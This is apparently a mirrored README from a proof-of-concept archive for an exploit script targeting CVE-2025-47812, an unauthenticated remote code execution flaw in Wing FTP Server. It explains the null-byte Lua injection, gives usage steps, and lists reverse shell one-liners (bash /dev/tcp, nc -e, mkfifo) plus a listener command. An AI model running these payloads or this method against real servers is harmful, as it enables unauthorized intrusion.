关联漏洞
介绍
===========================================================
CVE-2025-47812 - Wing FTP Server Remote Code Execution (RCE)
===========================================================
Author: blindma1den
Date: July 2025
Exploit Type: Remote Code Execution (Unauthenticated)
Target: Wing FTP Server < 7.4.4
CVSS Score: 10.0 (Critical)
-----------------------------------------------------------
DESCRIPTION
-----------------------------------------------------------
This script exploits CVE-2025-47812, a critical vulnerability
in Wing FTP Server's web interface that allows remote attackers
to execute arbitrary system commands or open a reverse shell
without authentication.
The flaw is caused by improper handling of null bytes (`%00`)
in the login form (`/loginok.html`). This allows Lua code
injection into session files, which are later evaluated
when endpoints like `/dir.html` are accessed.
-----------------------------------------------------------
SOURCES
-----------------------------------------------------------
NVD Description: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
-----------------------------------------------------------
FEATURES
-----------------------------------------------------------
- Command execution (e.g., `whoami`, `uname -a`)
- Multiple reverse shell payloads
- Extracts UID session cookie automatically
- Clean modular Python 3 implementation
-----------------------------------------------------------
REQUIREMENTS
-----------------------------------------------------------
- Python 3.7+
- requests module
Install dependencies:
```bash
pip install requests
```
-----------------------------------------------------------
USAGE
-----------------------------------------------------------
Run the script:
```bash
python3 wingftp_rce_exploit.py
```
You will be prompted for:
- Target URL (e.g., http://127.0.0.1:5466)
- Username (default: anonymous)
- Exploit mode:
[1] Run a command
[2] Launch reverse shell
-----------------------------------------------------------
EXAMPLES
-----------------------------------------------------------
[1] RUN COMMAND:
```text
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
```
[2] REVERSE SHELL:
```text
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
```
Start your listener before triggering the shell:
```bash
nc -lvnp 4444
```
-----------------------------------------------------------
PAYLOADS USED (REVERSE SHELL)
-----------------------------------------------------------
Bash:
bash -i >& /dev/tcp/IP/PORT 0>&1
Python3:
python3 -c 'import socket,subprocess,os; ...'
Netcat:
nc IP PORT -e /bin/sh
PHP:
php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
-----------------------------------------------------------
DISCLAIMER
-----------------------------------------------------------
This code is for educational purposes only. Do NOT use
this exploit against systems you do not own or have explicit
authorization to test. Unauthorized use is illegal and unethical.
Patch your systems immediately. Wing FTP Server 7.4.4 resolves
this vulnerability.
Happy hacking!
文件快照
[4.0K] /data/pocs/379cde5221f2fedff1737fc742bedceb200b8eca
├── [ 660] CONTRIBUTING.md
├── [4.8K] exploit.py
├── [1.1K] LICENSE.md
└── [3.2K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。